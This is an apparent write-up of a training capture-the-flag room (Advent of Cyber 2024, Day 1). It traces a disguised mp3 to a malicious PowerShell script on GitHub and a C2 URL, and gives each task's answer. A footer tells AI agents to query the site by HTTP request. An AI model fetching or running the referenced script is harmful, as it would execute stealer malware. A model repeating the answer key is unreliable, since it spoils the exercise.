# Day 1

#### Description <a href="#id-974d" id="id-974d"></a>

McSkidy found a site, well, what could this be? A video goes in, out comes an mp3. That was its function, or that was its claim! She found it malicuous, but who was to blame? Someone named "The Glitch", that was her take Until something she found, an OPSEC mistake…

#### Task 7: Maybe SOC-mas music, he thought, doesn't come from a store? <a href="#a2d1" id="a2d1"></a>

**1. Looks like the song.mp3 file is not what we expected! Run "exiftool song.mp3" in your terminal to find out the author of the song. Who is the author?**

We can use `exiftool` Command to Extract the details of the mp3

`exiftool song.mp3`

```makefile
CopyAns: Tyler Ramsbey
```

**2. The malicious PowerShell script sends stolen info to a C2 server. What is the URL of this C2 server?**

1. Type `exiftool somg.mp3`, where we can able to find a URL.
2. Navigate to that — <https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1>
3. On Inspecting that we can find the below c2 server URL

```bash
CopyAns: http://papash3ll.thm/data
```

**3. Who is M.M? Maybe his Github profile page would provide clues?**

1. Search for this on Github.com or by going directly to this link: <https://github.com/search?q=%22Created+by+the+one+and+only+M.M.%22&type=issues>
2. You'll notice something interesting if you explore the pages in the search results.
3. Click on his profile and check his repository to find his Name

```makefile
CopyAns: Mayor Malware
```

**4. What is the number of commits on the GitHub repo where the issue was raised?**

We can observe his repos that he has 1 commit.

```makefile
CopyAns: 1
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://foothold.gitbook.io/blog/advent-of-cyber-2024/day-1.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.